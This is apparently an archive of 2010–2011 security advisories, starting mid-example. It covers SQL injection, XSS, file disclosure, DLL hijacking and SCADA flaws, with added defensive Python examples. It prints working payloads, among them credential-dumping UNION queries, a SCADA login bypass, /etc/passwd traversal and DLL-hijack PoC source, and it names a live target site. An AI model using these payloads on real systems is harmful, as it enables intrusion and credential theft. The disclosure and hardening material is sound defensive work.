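                      'parent.{0}();</script></body></html>')

# Constructed values modelled on the advisory's reproduction request.
LEGIT = "KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0"
ATTACK = LEGIT + ";alert(document.cookie);//"


def render_keepalive_vulnerable(timer_method: str) -> str:
    """Same pattern as the advisory: the parameter goes straight into the script block."""
    return KEEPALIVE_TEMPLATE.format(timer_method)


def render_keepalive_hardened(timer_method: str, max_len: int = 128) -> str:
    """Reject anything that is not a plain identifier; no encoding can make ';' safe here."""
    if len(timer_method) > max_len or not JS_IDENTIFIER.fullmatch(timer_method):
        raise ValueError("TimerMethod must be a JavaScript identifier")
    return KEEPALIVE_TEMPLATE.format(timer_method)


def timer_method_from_query(query: str) -> str:
    """Pull TimerMethod out of a raw query string (percent-decoded by parse_qs)."""
    values = parse_qs(query, keep_blank_values=True).get("TimerMethod", [])
    return values[0] if values else ""


def is_suspicious_request(query: str) -> bool:
    """Detection side: True when the hardened renderer would have refused the request."""
    try:
        render_keepalive_hardened(timer_method_from_query(query))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(render_keepalive_vulnerable(ATTACK))
    print(is_suspicious_request("OpType=SessionKeepAlive&TimerMethod=" + ATTACK + "&CacheSeed="))
```

The advisory's observation that no opening or closing tags are needed is exactly why is_suspicious_request does not look for "<script": the only question worth asking about this parameter is whether it is an identifier.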


myBloggie 2.1.6 SQL-Injection, Advanced INSERT INTO Injection technique

2011-06-18
myBloggie 2.1.6 SQL-Injection, Advanced INSERT INTO Injection technique

Software: myBloggie 2.1.6
Severity: High
Author: Robin Verton info (at) robinverton (dot) de
Date: Jun. 12 2011
Vendor: http://mybloggie.mywebland.com/

Software Description:

myBloggie is considered one of the most simple, user-friendliest yet packed 
with features Weblog system available to date.

Issue details:

myBloggie 2.1.6 is - again - prone to a SQL injection vulnerability in the
trackback function. It is possible to add a malformed URL to a trackback so
that malicious code can be injected to insert or read out data from the
database.

An unsafe regular expression which does not properly check the passed
trackback URL can be bypassed to inject malicious data into an INSERT INTO
statement, resulting in a persistent cross-site scripting issue, or be used for
reading out sensitive data (see 'Advanced INSERT INTO exploitation by taking
advantage of the primary key' described here [1]).

Technical details:

trackback.php - Line 33-35

 $url = urldecode($_REQUEST['url']);
 if (validate_url($url) == false) {
     $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>");
 }

function.php - Line 750-755

 function validate_url($url) {
     // anchors the start of the URL only; nothing bounds what may follow the host
     if ( ! preg_match('#^http\\:\\/\\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+#i', $url, $matches) ) {
         return false;
     } else {
         return true;
     }
 }

As you can see, the end of the passed $url is not bounded in the regular
expression. By providing a URL like http://example.com'INJECTION the filter can
be bypassed.

Timeline:
12. July 2011 - Bug found.
12. July 2011 - Vendor contacted.
15. July 2011 - Full disclosure.

References:
[0] Original advisory: 
http://robinverton.de/blog/mybloggie-2-1-6-sql-injection-persistent-xss
[1] 
http://robinverton.de/blog/advanced-insert-into-injection-by-taking-advantage-of-the-primary-key
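Added example (Python, not the myBloggie code): the advisory's regular expression transcribed as-is, to show that it accepts the quoted bypass URL because nothing anchors the end of the match, beside a stricter validator that parses the URL, checks the host name labels and rejects characters a trackback URL has no use for. The allow-list and length limit are an assumed policy. Validation is only the first line: the trackback INSERT itself should still be a parameterized query.

```python
import re
from urllib.parse import urlsplit

# The pattern from function.php, transcribed: it anchors the start but not the end.
LOOSE_URL_RE = re.compile(r'^http\:\/\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+', re.I)

# Stricter rules (assumed policy): http/https only, RFC-style host labels, and a
# character allow-list in which quotes and whitespace never appear.
HOST_RE = re.compile(r'^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$', re.I)
ALLOWED_CHARS_RE = re.compile(r"[A-Za-z0-9\-._~:/?#\[\]@!$&()*+,;=%]*")

# The advisory's shape of input: a valid-looking host followed by a quote.
BYPASS = "http://example.com'INJECTION"


def validate_url_loose(url: str) -> bool:
    """Behaviour of the original validate_url(): a matching prefix is enough."""
    return LOOSE_URL_RE.match(url) is not None


def validate_url_strict(url: str, max_len: int = 2048) -> bool:
    """Whole-string allow-list, then structural checks on the parsed URL."""
    if len(url) > max_len or not ALLOWED_CHARS_RE.fullmatch(url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False   # user:pass@host is a classic way to smuggle a different host
    return HOST_RE.fullmatch(parts.hostname or "") is not None


if __name__ == "__main__":
    for candidate in (BYPASS, "http://example.com/blog/post-1?id=3#c"):
        print(candidate, "loose:", validate_url_loose(candidate), "strict:", validate_url_strict(candidate))
```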


Re: Chamilo 1.8.7 / Dokeos 1.8.6 Remote File Disclosure

2011-02-08
Dokeos 1.8.6.2 fixes these 2 security holes. Dokeos 1.8.6.2 has been released 
one day after we got informed about this security release. 

Download @sourceforge http://bit.ly/dYOvDc


Microsoft IIS 6 parsing directory "x.asp" Vulnerability

2011-01-27


# Microsoft IIS 6 parsing directory "x.asp" Vulnerability

#Discovered by:
Pouya Daneshmand
whh_iran[AT]yahoo[DOT]com
http://securitylab.ir/blog

#Introduction:
Using this vulnerability you can bypass some security filters; for example, a
file with a ".jpg" or ".rar" extension can be executed as an ASP (Active Server
Page) file.

#Vulnerable:
It only works for ASP files and works on Windows 2003 / IIS 6 (as I tested...).
The test failed on IIS 5.1 and IIS 7.

#Description:
1) Create a folder with an '.asp' extension.
2) Put your ASP code in a file with any extension (like .jpg, .rar, .txt) in
the folder you have created.
3) Open the file with your browser and you will see it is executed as an ASP
file!

#Note:
The extension of the file does not matter at all!

#Solution:
There is no patch to fix this security vulnerability yet; the best thing I can
say is to DISABLE ASP FILES FROM YOUR web server extensions, or remove the
"execute" permission from the upload directories.

#PS:
This vulnerability was first reported on 2010-06-19 in Persian
(http://sebug.net/vulndb/19820/)

#Original Advisory:
http://securitylab.ir/blog/dl/Microsoft-IIS6-parsing-directory-Vulnerability.pdf
http://securitylab.ir/blog/posts/11/Microsoft-IIS-6-parsing-directory-%E2%80%9Cx.asp%E2%80%9D-Vulnerability/
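Added example, not from the advisory: a small Python audit that walks an upload tree and reports directories whose name carries an .asp suffix (the condition the steps above rely on), together with an upload-time check that refuses a destination path containing such a directory. The directory tree is constructed in a temporary folder; only the .asp suffix is on the page, so the tuple holds nothing else.

```python
import os
import tempfile
from pathlib import Path

# From the advisory; extend only for extensions your IIS actually maps to a script engine.
EXECUTABLE_DIR_SUFFIXES = (".asp",)


def find_executable_dirs(root) -> list:
    """Relative paths of directories whose name ends with an executable suffix."""
    root = Path(root)
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        for d in dirnames:
            if d.lower().endswith(EXECUTABLE_DIR_SUFFIXES):
                hits.append((Path(dirpath) / d).relative_to(root).as_posix())
    return sorted(hits)


def is_safe_upload_path(relative_path: str) -> bool:
    """Upload-time rule: no path component, file or directory, may end with .asp."""
    parts = Path(relative_path).parts
    return not any(p.lower().endswith(EXECUTABLE_DIR_SUFFIXES) for p in parts)


def run_demo() -> dict:
    """Constructed tree: one plain upload folder and one named photos.asp."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uploads" / "normal").mkdir(parents=True)
        (root / "uploads" / "photos.asp").mkdir()
        (root / "uploads" / "normal" / "a.jpg").write_bytes(b"\xff\xd8 not really an image")
        (root / "uploads" / "photos.asp" / "b.jpg").write_bytes(b"not really an image")
        return {"executable_dirs": find_executable_dirs(root)}


if __name__ == "__main__":
    print(run_demo())
```

The audit complements rather than replaces the advisory's solution: removing the execute permission on upload directories is what stops the script engine, the scan just tells you which folders already violate the rule.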


Sigma Portal Denial of Service Vulnerability

2010-12-27
# 
# Securitylab.ir
# 
# Application Info:
# Name: Sigma Portal
# Vendor: http://www.sigma.ir
# 
# Vulnerability Info:
# Type: Denial of Service
# Risk: Medium
# 2010-08-11 - Vendor notified
#
Vulnerability:
http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%2791&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)

Setting large values for width and height makes it possible to create a large
load on the server.
# 
# Discovered By: Pouya Daneshmand
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir  whh_iran[at]yahoo.com
###


Asan Portal (IdehPardaz) Multiple Vulnerabilities

2010-12-27
#
# Securitylab.ir
#
# Application Info:
# Name: Asan Portal
# Vendor: http://iptech.ir/default.aspx?id=130
#
Vulnerability:

##
# Denial of Service:
##
http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=Content_Image1&w=1000&h=1000

Setting large values for width and height makes it possible to create a large
load on the server.

##
# SQL Injection:
##
http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75

#
# Discovered By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir
###


Mozilla Firefox 3.6.12 Denial of Service Vulnerability

2010-11-24
PoC:
<body onload="location='';alert('DoS');">

By: Pouya Daneshmand
Advisory: 
http://securitylab.ir/Advisories/Firefox%203.6.12%20Denial%20of%20Service%20Vulnerability.txt


[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass

2010-10-04
[STANKOINFORMZASCHITA-10-02] ITS SCADA – Authorization bypass
Authors: Eugene Salov (eug...@itdefence.ru), Andrej Komarov 
(koma...@itdefence.ru) 
Product: ITS SCADA 
CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:R/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 8.0
Availability of exploit: Yes

Product description:
ITS SCADA is a Supervisory Control And Data Acquisition (SCADA) system which
can interface with various heterogeneous industrial automation equipment of
the Motorola MOSCAD family. Additionally, it can be installed alongside
elements of the Wonderware product environment (Industrial SQL Server, MODBUS
I/O Server).
URL: http://www.itsdemo.com

Vulnerability description:
Unauthorized access to database field data can be obtained through SQL
injection. Moreover, it allows an attacker to bypass authorization without any
password validation.
Database structure:
«RTUinfo»: SiteNum, SiteType, Description;
«Alarms»: EventStamp, AlarmState, TagName, Description, Operator, Provider, 
EventStampUTC;
«BWMInfo»: RTU, SalesLocation, Description, Type, Summ;
«dtproperties»: id, objectid, property, value, uvalue, version;
«FlowData»: Site, iDate, DateTime, Rate, Peak, Average, Total, Lvl;
«sysconstraints»: constid, id, colid, spare1, status, actions, error;
«syssegments»: segment, name, status;
«Users»: UID, Password, AccessLevel.

The given elements of the database structure contain various information about
connected telemetry devices, users, failures and alarms that have occurred,
and the course of the technological process.

Exploitation method:
User ID = 1' or 1=(select top 1 password from Users)--
Password = blank

Solution:
There is no security update available for now. It is highly recommended not to
use default passwords for user authorization. Additionally, you can use ACLs
to allow access only from trusted hosts. Another additional safety measure is
the use of Web Application Firewalls (WAF) and IPS/IDS systems in the area
where the SCADA system is located.

About STC «STANKOINFORMZASCHITA»:
Science Technology Center (STC) «STANKOINFORMZACHITA» is the leading
information security company in the Russian Federation in the sphere of
automation and industrial security, providing information security consulting
services, information security audits, and penetration testing of SCADA and
industrial control systems.

Contact: info (at) itdefence (dot) ru
Russia, Moscow, Bolshaya Bochtovaya st., 26, Business Center
Tel.: +7 (495) 790-16-60
http://itdefence.ru 
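Added example, not from the advisory or the product: an SQLite model of the Users table named above (UID, Password, AccessLevel) with the login query written both ways, as string concatenation, which a quoted user ID like the one shown turns into an always-true WHERE clause, and as a parameterized query with the password compared in constant time after the lookup. SQLite has no "top 1", so the constructed bypass value uses a constant comparison; the stored-hash scheme is an assumption for the example.

```python
import hashlib
import hmac
import sqlite3


def hash_password(password: str) -> str:
    """Stand-in hashing (assumption for the example; use a slow KDF such as scrypt in practice)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory Users table with the columns listed in the advisory."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (UID TEXT PRIMARY KEY, Password TEXT, AccessLevel INTEGER)")
    con.execute("INSERT INTO Users VALUES (?, ?, ?)", ("operator", hash_password("s3cret"), 1))
    con.commit()
    return con


def login_vulnerable(con, uid: str, password: str):
    """The user ID is spliced into the SQL text: a quote in it rewrites the WHERE clause."""
    sql = (f"SELECT UID, AccessLevel FROM Users "
           f"WHERE UID = '{uid}' AND Password = '{hash_password(password)}'")
    return con.execute(sql).fetchone()


def login_hardened(con, uid: str, password: str):
    """Bound parameter for the lookup; the password check never touches SQL."""
    row = con.execute("SELECT UID, Password, AccessLevel FROM Users WHERE UID = ?", (uid,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], hash_password(password)):
        return None
    return (row[0], row[2])


# Same shape as the advisory's input; the comment marker discards the password clause.
BYPASS_UID = "1' or 1=1--"


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, BYPASS_UID, "anything"))
    print("hardened:  ", login_hardened(con, BYPASS_UID, "anything"))
```

With the bound parameter the whole of BYPASS_UID is compared against the UID column as one literal string, so the row lookup simply fails; the WAF and IPS measures in the solution above reduce exposure, but only the query change removes the flaw.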


[STANKOINFORMZASCHITA-10-01] Netbiter® webSCADA multiple vulnerabilities

2010-10-01
[STANKOINFORMZASCHITA-10-01] Netbiter® webSCADA – multiple vulnerabilities 

Authors: Eugene Salov (eug...@itdefence.ru), Andrej Komarov 
(koma...@itdefence.ru) 
Product: Netbiter® webSCADA 
CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:R/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 8.0
Availability of exploit: Yes

Product description:
Netbiter® webSCADA (WS100/WS200) is one of the popular products in industrial
automation, allowing remote access to field devices based on MODBUS TCP over
Ethernet, GSM and GPRS channels. The Netbiter is equipped with both Ethernet
and a built-in GSM/GPRS modem for communication with remote equipment. This
means that it can communicate both over an Ethernet LAN and wirelessly using
the built-in modem. In addition it also supports an external GPS receiver to
keep track of its geographical position. The Netbiter solution has an embedded
web server and HMI, which provides management functions for detecting alarms
and emergencies with subsequent notification by SMS, e-mail or the SNMP
protocol.
URL: Intellicom Innovation AB (http://www.intellicom.se)

Vulnerability description:
1. Local File Disclosure (WASC Web Application Threat Classification):
/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00

2. Users information disclosure:
/cgi-bin/read.cgi?file=/home/config/users.cfg

3. Malware code can be uploaded by injecting a specially crafted GIF image
when the logo page is modified:
/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2

A GIF image can carry hidden malicious code (a «web shell»), which can then be
used for SCADA server management and unauthorized execution of OS commands.

Solution:
There is no security update available for now. It is highly recommended not to
use default passwords for user authorization. Moreover, you can additionally
use ACLs to allow access only from trusted hosts. Another additional safety
measure is the use of Web Application Firewalls (WAF) and IPS/IDS systems in
the area where the SCADA system is located.

About STC «STANKOINFORMZACHITA»:
Science Technology Center (STC) «STANKOINFORMZACHITA» is the leading Russian
information security company in the sphere of automation and industrial
security, providing information security consulting services, information
security audit, and penetration testing of SCADA and industrial control systems.

Contact: i...@itdefence.ru
Russia, Moscow, Bolshaya Bochtovaya st., 26, Business Center
Tel.: +7 (495) 790-16-60
http://itdefence.ru  


Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)

2010-08-30 Thread info
=
Found By: Kamran Safaei Tabrizi(k4mr4n_st(at)yahoo(dot)com)
Securitylab Security Research Team
Website: http://www.securitylab.ir
Special Thanks: Mazo shinozuki, BangoDragon
=
#include <windows.h>   /* the original includes "stdafx.h", the MSVC precompiled header */

/* The PoC payload: only pops a message box to prove the planted DLL was loaded. */
void init() {
    MessageBox(NULL, TEXT("Mazo!"), TEXT("k4mr4n!"), 0x0003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        init(); break;          /* runs as soon as wscript.exe maps the DLL */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
=


Flash Player 9 DLL Hijacking Exploit (schannel.dll)

2010-08-27 Thread info
===

Flash player 9.exe DLL Hijacking Exploit (schannel.dll)

===

Found By: Securitylab.ir (Kamran Safaei Tabrizi)

===

#include <windows.h>   /* the original includes "stdafx.h", the MSVC precompiled header */

/* The PoC payload: only pops a message box to prove the planted DLL was loaded. */
void init() {
    MessageBox(NULL, TEXT("Ops"), TEXT("OpS!"), 0x0003);
}

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        init(); break;          /* runs as soon as the player maps the DLL */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

=



IE6 css set Denial of Service Vulnerability

2010-07-12 Thread info
Published by Securitylab.ir
Founder: unknown

<style type="text/css">
<!--
The question is which CSS style set is wrong at the time.
The CSS definition is f: expression(this.src='about:blank', this.outerHTML='');
the problem should be in mshtml.dll
-->
/*<![CDATA[*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
#f126{v:expression()!important}
/*]]>*/
</style>
<iframe id="f126" src="test">

Original Advisory:
http://securitylab.ir/other/IE-1.txt


Cherokee Web Server 0.5.3 Multiple Vulnerabilities

2010-06-14 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Cherokee Web Server
# Version: 0.5.3
# Download: http://mirror.aarnet.edu.au/pub/cherokee/windows/Cherokee-setup-0.5.3.exe
#

[Directory Traversal]:

http://127.0.0.1/%5C../%5C../%5C../boot.ini%20


[Remote Source Disclosure]:

http://127.0.0.1:80/file.html::$DATA

http://127.0.0.1/index.htm%20

#
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.info
# Contacts: info[at]securitylab.ir & i...@pouya[dot]info
###


Re: RE: Nginx 0.8.35 Space Character Remote Source Disclosure

2010-06-01 Thread info
The vulnerability doesn't work in the stable versions now.
Original Advisory:
http://blog.pouya.info/userfiles/vul/NginX.rar


Nginx 0.8.35 Space Character Remote Source Disclosure

2010-05-31 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Nginx
# Tested on nginx 0.8.35
# Nginx 0.8.36 and higher is not vulnerable
#
# Vulnerability Info:
# Type: Remote File Disclosure
# Risk: High
#
# Vulnerability:
# http://localhost/file.php%20
#
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: whh_iran[at]securitylab.ir & i...@securitylab[dot]ir
###


Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 id parameter Information Disclosure Vulnerability

2010-05-25 Thread info
Not working. Tested on: XP SP2, IE6


Ziggurat CMS Multiple Vulnerabilities

2010-04-15 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Ziggurat CMS
# Vendor: http://www.farsi-cms.com
#
Vulnerability:

# Arbitrary File Upload
http://site.com/manager/upload.asp

# Remote File Download
http://site.com/manager/backup.asp?bck=./../file.asp

# Cross Site Scripting
http://site.com/index.asp?id=<script>(xss)</script>
#
# 2010-04-10 - Vendor notified
# 2010-04-15 - Public disclosure
#
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###


Vana CMS Remote File Download

2010-04-13 Thread info
#  
# Securitylab.ir  
#  
# Application Info:  
# Name: Vana CMS
# Vendor: http://www.vanasoft.com
#  
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
# 2009-10-23 - Found Vulnerability
# 2010-04-09 - Vendor notified
# 2010-04-11 - Public disclosure
#
Vulnerability:  
http://site.com/download.php?filename=File.php
#  
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###


Hack.lu 2010 CfP

2010-04-06 Thread info

Call for Papers Hack.lu 2010

The purpose of the hack.lu convention is to give an open and free playground
where people can discuss the implications of new technologies in society.
hack.lu is a balanced mix convention where technical and non-technical people
can meet each other and share freely all kinds of information. The convention
will be held in the Grand-Duchy of Luxembourg in October 2010 (27-29.10.2010).
The most significant new discoveries about computer network attacks and
defenses, commercial security solutions, and pragmatic real world security
experience will be presented in a three-day series of informative tutorials.
We would like to announce the opportunity to submit papers and/or lightning
talk proposals for selection by the hack.lu technical review committee. This
year we will be doing workshops on the first day and talks of 1 hour or 30
minutes in the main track on the two following days.



Scope

Topics of interest include, but are not limited to :

  * Software Engineering and Security
  * Honeypots/Honeynets
  * Spyware, Phishing and Botnets (Distributed attacks)
  * Newly discovered vulnerabilities in software and hardware
  * Electronic/Digital Privacy
  * Wireless Network and Security
  * Attacks on Information Systems and/or Digital Information Storage
  * Electronic Voting
  * Free Software and Security
  * Assessment of Computer, Electronic Devices and Information Systems
  * Standards for Information Security
  * Legal and Social Aspect of Information Security
  * Software Engineering and Security
  * Security in Information Retrieval
  * Network Security
  * Forensics and Anti-Forensics
  * Mobile Communications Security and Vulnerabilities



Deadlines

The following  dates are important if  you want to  participate in the
CfP

Abstract submission : no later than 1st June 2010

Full paper submission : no later than 15th July 2010

Notification date : mid of August


Submission guideline 

Authors should submit a paper in English of up to 5.000 words, using a
non-proprietary and open electronic format. The program committee will review
all papers and the author of each paper will be notified of the result by
electronic means. The abstract is up to 400 words. Submissions must be sent to
http://2010.hack.lu/cfp/

Submissions should also include the following:


 1. Presenter, and geographical location (country of origin/passport)
and contact info.
 2. Employer and/or affiliations.
 3. Brief biography, list of publications or papers.
 4. Any significant presentation and/or educational
experience/background.
 5. Reason why this material is innovative or significant
or an important tutorial.
 6. Optionally, any samples of prepared material or outlines ready.
 7. Information about whether the submission has already been presented,
and where.

Presentations/topics that haven't been presented before
will be rewarded.


The information will be used only  for the sole purpose of the hack.lu
convention including  the information on  the public website.   If you
want to remain anonymous, you have the right to use a nickname.

If the paper  is not accepted in the main track,  it could be accepted
in  short or lightning  talk session  but in  this case  the speakers'
privileges are not applicable.

Speakers' Privileges 

* Accommodation will be provided (3 nights)
* Travel expenses will be covered up to a max amount
* Conference speakers night

Publication and rights

Authors keep the  full rights on their publication/papers  but give an
unrestricted  right  to  redistribute  their papers  for  the  hack.lu
convention and its related electronic/paper publication.

Sponsoring

If  you  want  to  support  the  initiative  and  gain  visibility  by
sponsoring, please contact us by writing an e-mail to info(AT)hack.lu

Web site and wiki

http://www.hack.lu/

CfP website : http://2010.hack.lu/cfp/



XSS vulnerability in easy page cms

2010-03-29 Thread info
#  
# Securitylab.ir  
#  
# Application Info:  
# Name: Easy Page
# Vendor: http://easypage.org
#  
# Vulnerability Info:
# Type: XSS
# Risk: low
#
Vulnerability:  
http://site.ir/default.aspx?page=Document&app=Documents&docId=1&docParId=<script>(xss)</script>
#  
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###


Joomla Component com_xmap Sql Injection Vulnerability

2010-03-29 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Joomla Component com_xmap
#
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
# 
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


IE 6.0 - Local Crash Exploit

2010-03-23 Thread info
###
# Securitylab.ir
###
Vul:

<object id="opi" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6"
style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">.!.</a>
</pre>
###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand 
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###


Official Portal 2007 Multiple Vulnerabilities

2010-02-23 Thread info
#  
# Securitylab.ir  
#  
# Application Info:  
# Name: Official Portal 2007
#  
# Vulnerability Info:
# Type: Sql Injection/XSS
# Risk: Medium
# Dork: Official Portal 2007
#
Vulnerability:  
===  
Sql Injection
===  
http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--

===  
Cross Site Scripting
===  
http://site.com/?fa=<SCRIPT/SRC=http://site.com/xss.js></SCRIPT>
 
#  
Live Test: http://www.bkd-bandungkab.com
#  
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###


Pixel Portal Sql Injection Vulnerability

2010-02-18 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Pixel Portal
# Vendor: http://www.pixelidea.ir
#
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#
Vulnerability:
http://site.ir/products_list_fa.asp?id=-1001+UNION+ALL+SELECT+1,2,3,4,5,6,7,username,password,10,11,12,13+From+admin
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


Re: Re: Joomla (Jw_allVideos) Remote File Download Vulnerability

2010-02-18 Thread info
You're right.
It's working at version 1.0 only ;)

# Application Info:
# Name: Joomla (jw_allvideos Plugin)
#  Version: 1.0  


Joomla (Jw_allVideos) Remote File Download Vulnerability

2010-02-16 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#
# Vulnerability:
# 
http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


IE address bar characters into a small feature

2010-02-16 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Internet Explorer
# Version: 8.0
#
Vulnerability: IE address bar characters into a small feature 
My IE 8 automatically converts a \ (0x5c) entered in a URL in the address bar
into / (0x2f).
Example: www.securitylab.ir\a is converted to www.securitylab.ir/a
Recently it was found that some phishing sites take advantage of this feature
to bypass some security checks; it is hereby noted.
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###
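The bypass described in the post above comes from checking the raw URL string while the browser rewrites every backslash to a slash before resolving the host. The following is an added example, not code from the post: a host allow-list check in its naive form beside a form that normalises the way IE 8 (and today's WHATWG URL parser for http/https) does. The allow-list suffix, the `evil.test` host and the URLs are constructed for the demo.

```python
from urllib.parse import urlsplit

# Constructed allow-list: the filter only wants to let links to this site through.
TRUSTED_SUFFIX = "securitylab.ir"


def naive_host(url: str) -> str:
    """Host as a simplistic URL filter extracts it: everything between "://"
    and the first "/". A backslash is not treated as a delimiter here."""
    rest = url.split("://", 1)[1]
    return rest.split("/", 1)[0].lower()


def browser_host(url: str) -> str:
    """Host as IE 8 resolves it: every "\\" is rewritten to "/" first, so the
    authority part ends at the first backslash as well as the first slash."""
    scheme, rest = url.split("://", 1)
    normalised = scheme + "://" + rest.replace("\\", "/")
    return (urlsplit(normalised).hostname or "").lower()


def is_trusted(host: str) -> bool:
    """Suffix match of the kind many link filters use."""
    return host == TRUSTED_SUFFIX or host.endswith("." + TRUSTED_SUFFIX)


def allowed_naive(url: str) -> bool:
    """Filter that judges the raw string: bypassable with a backslash."""
    return is_trusted(naive_host(url))


def allowed_normalised(url: str) -> bool:
    """Filter that judges the host the browser will actually contact."""
    return is_trusted(browser_host(url))


if __name__ == "__main__":
    # Constructed URLs: the first is the post's own example, the second is the
    # phishing shape it warns about (evil.test is a placeholder host).
    for url in ("http://www.securitylab.ir\\a",
                "http://evil.test\\www.securitylab.ir/login"):
        print(f"{url:45} naive={allowed_naive(url)!s:5} "
              f"normalised={allowed_normalised(url)!s:5} "
              f"browser_host={browser_host(url)}")
```

With the raw-string check the phishing URL passes (its "host" ends in the trusted suffix) while the legitimate backslash URL is blocked; after normalisation both decisions match where the browser really goes.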


mongoose Space Character Remote File Disclosure Vulnerability

2010-02-08 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: mongoose
# Version: 2.8
# Download: http://code.google.com/p/mongoose/downloads/list
#
# Vulnerability Info:
# Type: Remote Source Disclosure
# Risk: Medium
#
# Vulnerability:
# http://127.0.0.1/file.php%20%20%20
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###


Tavanmand Portal (fckeditor) Remote Arbitrary File Upload Vulnerability

2010-02-01 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Tavanmand Portal
# version: 1.1
# Vendor: http://www.tavanmand.ir
#
Vulnerability:
http://site.ir/fckeditor/editor/filemanager/upload/test.html

Uploaded file here http://site.ir/UserFiles/FILE.ASPX
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###


eWebeditor ASP Version Multiple Vulnerabilities

2010-02-01 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: eWebeditor
# Version: ASP
#
Vulnerability:

===
Arbitrary File Upload
===
